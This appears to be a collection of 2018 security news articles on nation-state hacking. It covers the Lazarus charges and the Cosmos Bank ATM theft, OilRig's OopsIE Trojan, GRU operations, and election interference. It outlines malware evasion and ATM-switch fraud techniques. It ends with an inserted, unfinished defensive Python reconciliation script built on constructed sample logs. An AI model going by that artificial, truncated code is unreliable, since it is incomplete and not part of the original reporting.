Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

“The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.”

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible borders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”

Iranian Hackers Improve Recently Used Cyber Weapon
6.9.2018 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 2018. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allows it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware includes support for various commands that it receives from the server: it can run a command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents; and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

What's GRU? A Look at Russia's Shadowy Military Spies
6.9.2018 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:

Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause nor place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence "that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."

Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.

The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."

'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.2018 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

While some law enforcement agencies contend that encryption is being used to shield criminal activity, tech firms and privacy activists argue that any weakening of encryption would harm security for all users.

"The risk is that these countries will compel providers to build a backdoor that not only governments will exploit but hackers, criminals and other bad guys will use as well," said Greg Nojeim of the Washington-based Center for Democracy & Technology.

"It would weaken cybersecurity at the same time governments are preaching that cybersecurity needs to be addressed."

Marc Rotenberg, president of the Electronic Privacy Information Center, called the latest effort "a short-sighted and counterproductive proposal" and added that "it has become clear that encryption is vital for both privacy and public safety."

Similar concerns were voiced by Amnesty International, which said in a tweet, "This won't make us safer -- it will just weaken security for everyone."

Debate on 'going dark'

Encryption has been a hot-button issue in the United States for years, and came to a head in 2016 when Apple challenged the FBI's request to create software that would enable investigators to access an iPhone used by an attacker in a 2015 mass shooting in San Bernardino, California.

The US government eventually dropped its demand after finding another means to access the device, but a number of law enforcement officials have complained that they are "going dark" with the use of encrypted apps and devices that cannot be accessed by traditional wiretaps.

Nojeim said the claim of "going dark" is vastly exaggerated.

"There has never been more electronic information available to assist criminal and intelligence investigations," he said.

"We leave a digital footprint with virtually everything we do online and most of those footprints can be collected without the hindrance of encryption."

But James Lewis of the Center for Strategic and International Studies, who supports better law enforcement access, said tech firms may face more pressure than in the past.

"It's part of the bigger public move to rein in the tech companies and make them more socially responsible," Lewis said. "The old laissez-faire arguments are losing ground."

Will Russian Hackers Affect This Year's US Election?
4.9.2018 securityweek  BigBrothers

Nearly a year after Russian government hackers meddled in the 2016 U.S. election, researchers at cybersecurity firm Trend Micro zeroed in on a new sign of trouble: a group of suspect websites.

The sites mimicked a portal used by U.S. senators and their staffs, with easy-to-miss discrepancies. Emails to Senate users urged them to reset their passwords — an apparent attempt to steal them.

Once again, hackers on the outside of the American political system were probing for a way in.

"Their attack methods continue to take advantage of human nature and when you get into an election cycle the targets are very public," said Mark Nunnikhoven, vice president of cloud research at Trend Micro.

Now the U.S. has entered a new election cycle. And the attempt to infiltrate the Senate network, linked to hackers aligned with Russia and brought to public attention in July, is a reminder of the risks, and the difficulty of assessing them.

Newly reported attempts at infiltration and social media manipulation — which Moscow officially denies — point to Russia's continued interest in meddling in U.S. politics. There is no clear evidence, experts said, of efforts by the Kremlin specifically designed to disrupt elections in November. But it wouldn't take much to cause turmoil.

"It's not a question of whether somebody is going to try to breach the system, to manipulate the system, to influence the system," said Robby Mook, who managed Hillary Clinton's presidential campaign and co-directs a Harvard University project to protect democracy from cyberattacks, in an interview earlier this year. "The question is: Are we prepared for it?"

Online targeting of the U.S. political system has come on three fronts — efforts to get inside political campaigns and institutions and expose damaging information; probes of electoral systems, potentially to alter voter data and results; and fake ads and accounts on social media used to spread disinformation and fan divisions among Americans.

In recent weeks, Microsoft reported that it had disabled six Russian-launched websites masquerading as U.S. think tanks and Senate sites. Facebook and the security firm FireEye revealed influence campaigns, originating in Iran and Russia, that led the social network to remove 652 impostor accounts, some targeted at Americans. The office of Republican Sen. Pat Toomey of Pennsylvania said hackers tied to a "nation-state" had sent phishing emails to old campaign email accounts.

U.S. officials said they have not detected any attempts to corrupt election systems or leak information rivaling Kremlin hacking before President Donald Trump's surprise 2016 victory.

Still, "we fully realize that we are just one click away of the keyboard from a similar situation repeating itself," Dan Coats, the director of national intelligence, said in July.

Michael McFaul, the architect of the Obama administration's Russia policy, has said he believes Russian President Vladimir Putin perceives little benefit in a major disruption effort this year, preferring to keep his powder dry for the 2020 presidential contest.

But even if the upcoming elections escape disruption, that hardly means the U.S. is in the clear.

Trump's decision in May to eliminate the post of White House cybersecurity coordinator confirmed his lack of interest in countering Russian meddling, critics say. Congress has not delivered any legislation to combat election interference or disinformation. Last week, a review of the bipartisan "Secure Elections Act" was canceled after Republican leaders registered objections, congressional staffers said.

The risks extend beyond the midterms.

"The biggest question is going to be how are you going to make sure that people actually trust the results, because democracy relies on credibility," said Ben Nimmo, a researcher at the Atlantic Council. "It's not over after November."

Experts said it is too late to safeguard U.S. voting systems and campaigns this election cycle. But with two months to go, there is time enough to take stock of the Russian-sponsored interference that has come to light so far — and to assess the risks of what we don't know.

In mid-2016, hackers found a way into the voter registration database at the Illinois State Board of Elections and spent three weeks poking around. After the breach was discovered, officials said the infiltrators had downloaded the records of up to 90,000 voters.

It's not clear that anything nefarious was done with those records. But when special counsel Robert Mueller charged a dozen Russian intelligence agents with hacking this July, the indictment clarified the potential for damage. The hackers had, in fact, stolen information on 500,000 voters, including dates of birth and partial Social Security numbers.

"The internet allows foreign adversaries to attack Americans in new and unexpected ways," Deputy Attorney General Rod Rosenstein said, in announcing the indictments.

The Illinois hack is the most notable case of foreign tampering with U.S. election systems to come to light. There has been no evidence of efforts to change voter information or tamper with voting machines, though experts caution hackers might have planted unseen malware in far-flung election systems that could be triggered later.

Potential problems are not limited to Illinois.

A week before the 2016 general election, Russian intelligence agents sent spear-phishing emails to 122 local elections officials who were customers of VR Systems, a Tallahassee, Florida-based election software vendor.

In addition to Illinois, at least 20 other state systems were probed by the same Russian military unit that targeted VR's customers, federal officials said.

"My unofficial opinion is that we're kind of fooling ourselves if we don't think that they tried to at least make a pass at all 50 states," said Christopher Krebs, the undersecretary for critical infrastructure at DHS.

In June 2017, the federal Election Assistance Commission informed dozens of local voting officials that hackers had attempted to penetrate the systems of a voting system manufacturer, presumed by many to be VR.

"Attempts have been made to obtain voting equipment, security information and in general to probe for vulnerabilities," the EAC wrote officials. Despite those concerns, federal officials have moved slowly to share intelligence with officials who supervise elections. As of mid-August, 92 state officials had been given clearances.

Much of the machinery used to collect and tabulate votes is antiquated, built by a handful of unregulated and secretive vendors, with outdated software that makes them highly vulnerable to attacks, researchers said.

"If someone was able to compromise even a handful of voting machines I think that would be sufficient to cause people to not trust the system," said Sherri Ramsay, a former National Security Agency senior executive.

This spring, a website used by Knox County, Tennessee, officials to display election-night results was knocked offline by an unidentified perpetrator. While the attack was little noticed, it would not be hard to replicate, experts said. Combined with a social media campaign alleging vote tampering, such mischief could cast a shadow over an election, they said.

Election officials have been sandboxing such scenarios for weeks as they prepare for November's balloting.

There's already a Russian playbook for thwarting an election: In Ukraine in 2014, the presidential contest was disrupted by a virus that scrambled election-management software, followed by a media disinformation campaign claiming a pro-Moscow candidate had won.

Democratic Sen. Claire McCaskill of Missouri is plenty busy this fall as she seeks re-election in a state that voted overwhelmingly for Trump. So when an attempt by Russian hackers to infiltrate her campaign came to light in July, she acknowledged it only briefly.

"While this attack was not successful, it is outrageous that they think they can get away with this," McCaskill said. "I will not be intimidated. I've said it before and I will say it again, Putin is a thug and a bully."

The failed hack, which included an attempt to steal the password of at least one McCaskill staffer through a fake Senate login website identified by Microsoft, is the most notable instance of attempted campaign meddling by Russia made public this year.

Microsoft executives said recently that the company had detected attempts by Russia's GRU military intelligence agency to hack two senators. One was presumably McCaskill, but the other has not been identified.

The group behind that attempt, Fancy Bear, is the same one indicted July 13 and identified by Microsoft as the creator of fake websites targeting the Hudson Institute and the International Republican Institute, frequent critics of the Kremlin. Since the summer of 2017, Fancy Bear has aggressively targeted political groups, universities, law enforcement agencies and anti-corruption nonprofits in the U.S. and elsewhere, according to TrendMicro.

"Russian hackers appear to be broadening their target set, but I think tying it to the midterm elections is pure speculation at this point," said Michael Connell, an analyst at the federally funded Center for Naval Analyses in Arlington, Virginia.

There have been other recent reports of U.S. congressional campaign websites targeted by hackers, but that doesn't mean Russian agents are to blame. Experts said most are likely run-of-the-mill criminal cyberattacks seeking financial gain rather than political change.

But Eric Rosenbach, who served as assistant secretary of defense for global security during President Barack Obama's administration and is now at Harvard, said the limited examples of Russian intrusion that have come to light may be only a tip to more significant, still hidden schemes.

"There probably have already been compromises of important campaigns in places where it could sway the outcome or undermine trust in the election," Rosenbach said. "We might not see that until the very last moment."

The risk is magnified by poor efforts to protect many campaign sites, said Josh Franklin, until last month the lead National Institutes of Standards and Technology researcher on voting systems security.

Nearly a third of the 527 House of Representatives campaigns examined by Franklin and fellow researchers had such poor cybersecurity they were graded worse than failing.

"We couldn't go any further with our scan," he said. "We were told that we would be in danger of being sued by the candidate campaigns."

By the time a group called "ReSisters" began organizing a rally against white nationalism for Aug. 10, it had spent more than a year sharing left-wing posts about feminism, immigration and other hot-button topics.

"Confront + Resist Fascism," the group urged on a Facebook event page for its "No Unite the Right 2" protest in Washington, D.C. Like-minded Facebook users posted information about transportation, materials and location so those interested could attend.

In late July, Facebook short-circuited the effort, shutting down the pages and accounts of ReSisters and 31 others. Despite appearing to speak for Americans, the company said, the accounts were planted by unidentified outsiders to fuel divisions among U.S. voters. Researchers at the Atlantic Council who examined the accounts said they acted in ways echoing Russian troll operations before the 2016 election, pointing to English on the pages speckled with grammatical mistakes typical of native Russian speakers.

"We face determined, well-funded adversaries who will never give up and are constantly changing tactics," Facebook said. The outing of the sites is a reminder as November approaches that Russians and other foreign actors continue to use social media to try to influence U.S. politics.

Since the 2016 election, officials and researchers have learned much more about such infiltration. The May release by House Democrats of more than 3,500 ads placed on Facebook by Russian agents from 2015 to 2017 revealed a deliberate campaign to inflame racial divisions in the U.S. Facebook and other tech companies say they are working hard to combat such behavior. But it is not nearly enough, experts said.

The companies must be forced to act faster against Russian and other disinformation campaigns and be made more accountable, said Dipayan Ghosh, a fellow at Harvard's Kennedy School of Government who has worked at both the White House and Facebook on tech policy including social media manipulation.

Ghosh said quantifying Russian disinformation on social media is difficult because they "are operating behind a commercial veil" of for-profit networks that are not subject to public scrutiny.

"The industry is currently accountable to nobody," Ghosh said.

After Facebook was criticized for allowing a data-mining firm to collect information about millions of its users, CEO Mark Zuckerberg said he was open to regulation. But the "Honest Ads Act," which would require online political ads to be identified as they are in traditional media, has stalled in Congress.

The bill's sponsors include the late John McCain and Sen. Mark Warner, the Virginia Democrat who has pressed Facebook for change since the 2016 elections. Executives from Facebook, Twitter and Google are expected to testify before Warner and other members of the Senate Intelligence Committee this week.

Experts said they are uncertain of the effectiveness of Russian disinformation, complicating assessment of the threat it might now pose.

In 2016, Russian actors likely did the greatest damage by hacking and leaking emails from Hillary Clinton's campaign and Democrats' national organization, which were widely reported by the news media. But comparatively few American voters saw individual pieces of misinformation on social media, making it unlikely that it swayed votes, said Brendan Nyhan, a University of Michigan political scientist who has analyzed the scope and impact of the Russian operations.

"There's still too much simplistic thinking about all-powerful propaganda that doesn't correspond to what we know from social science about how hard it is to change people's minds. I'm more concerned about the threat of intensifying polarization and calling the legitimacy of elections into question than I am about massive swings in vote choice," he said.

Still, it is clear that Russian intelligence views its efforts as successful and their example has already stirred others, like Iran, to try similar strategies. Such efforts are bent on coloring U.S. politics even if they are not tied to a specific election, said Lee Foster, FireEye's manager of information operations analysis.

"Where do you draw the line between efforts to influence the election or an election or efforts to influence U.S. domestic politics in general?" Foster said. "We can't just think in the context of the next election. It's not like this goes away after the midterms."

Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.2018 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement, media groups will share information and strategies with the government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the Tv3.lt news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.

Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek Social  BigBrothers

The Telegram encrypted messenger app said Tuesday it would cooperate with investigators in terror probes when ordered by courts, except in Russia, where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned Whatsapp, says it complies with authorities in accordance with "applicable law".

Google Tells Toomey Hackers Tried to Infiltrate Staff Email
28.8.2018 securityweek Hacking  BigBrothers

Google has alerted U.S. Sen. Pat Toomey's office that hackers with ties to a "nation-state" sent phishing emails to old campaign email accounts, a spokesman for the Pennsylvania Republican said Friday.

Toomey's office was notified this week about the attempt to infiltrate email accounts, said spokesman Steve Kelly. He said the dormant accounts hadn't been used since the end of the 2016 campaign, and the staffers they're attached to no longer work for Toomey. The nation-state wasn't identified.

"This underscores the cybersecurity threats our government, campaigns, and elections are currently facing," he said. "It is essential that Congress impose tough penalties on any entity that undermines our institutions."

Toomey currently isn't running for office and the effort would not have affected the upcoming midterm elections.

Google told Toomey's office that the emails appeared to be exploratory, Kelly said. Based on scans for spam, phishing and malware, the emails likely did not contain malware or links to a credential-phishing site, he said.

A Google spokesman said the company wasn't commenting on the phishing attempt.

The notification is the latest by a tech company of suspected Kremlin attempts to spy on U.S. elected officials and campaigns and potentially meddle in U.S. politics.

Google's warning to Toomey comes just weeks after a Microsoft discovery led Sen. Claire McCaskill, a Missouri Democrat who is running for re-election, to reveal that state-backed Russian hackers tried unsuccessfully to infiltrate her Senate computer network last fall.

That effort recalled what U.S. prosecutors called in a July 13 indictment a concerted effort by Russian military operatives ahead of the 2016 election focused on helping to elect Republican Donald Trump to the presidency by exposing internal divisions in the Democratic Party meant to discredit his opponent, Hillary Clinton. The indictment says the Russian agents broke into Democratic national organization servers and stole and leaked damaging emails.

On Tuesday, Microsoft disclosed what it called new Russian espionage efforts targeting U.S. political groups — this time conservative Republican foes that have promoted sanctions to punish the Kremlin for military aggression against Ukraine.

The company said a group tied to the Russian government created fake websites — presumably to steal passwords or plant spyware— that appeared to spoof two American conservative organizations: the Hudson Institute and the International Republican Institute. Three other fake sites were designed to look as if they belonged to the U.S. Senate.

The Kremlin denied involvement.

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year-old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages to authorize the transactions and also to stop the details sent from the payment switch from reaching the CBS (thus, checks on card number, card status, PIN, and more were never performed).
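The authorization bypass described above (switch approves, CBS never sees the request) is detectable by reconciling the two logs after the fact. The following is an added example, not Securonix's or Cosmos Bank's code; the log format, field names, card numbers and transactions are all constructed for illustration.

```python
"""Reconcile ATM switch approvals against core banking system (CBS) authorizations.

Added example (not Securonix's or the bank's own code). A rogue switch can approve
withdrawals while the real authorization request never reaches the CBS, so card,
status and PIN checks are skipped. Periodically comparing the switch's approval log
with the CBS decision log exposes every approval the CBS never made. All log lines
and field names below are constructed for this example.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Txn:
    txn_id: str
    card: str        # masked PAN
    amount: float
    country: str
    ts: datetime
    decision: str    # "APPROVED" or "DECLINED"


# Constructed switch-side log: what the switch told the ATM network.
SWITCH_LOG = """
# ts|txn_id|card|amount|country|decision   (constructed sample)
2018-08-11T03:14:05|T1001|411111******1111|200.00|IN|APPROVED
2018-08-11T03:15:40|T1002|411111******1111|250.00|AE|APPROVED
2018-08-11T03:20:11|T1003|411111******1111|300.00|GB|APPROVED
2018-08-11T03:22:00|T1004|522222******2222|100.00|IN|APPROVED
2018-08-11T03:25:30|T1005|522222******2222|100.00|IN|DECLINED
2018-08-11T03:30:00|T1006|533333******3333|500.00|US|APPROVED
2018-08-11T03:31:00|T1007|533333******3333|80.00|US|APPROVED
"""

# Constructed CBS-side log: what the core banking system actually decided.
CBS_LOG = """
# ts|txn_id|card|amount|country|decision   (constructed sample)
2018-08-11T03:22:01|T1004|522222******2222|100.00|IN|APPROVED
2018-08-11T03:25:31|T1005|522222******2222|100.00|IN|DECLINED
2018-08-11T03:30:01|T1006|533333******3333|50.00|US|APPROVED
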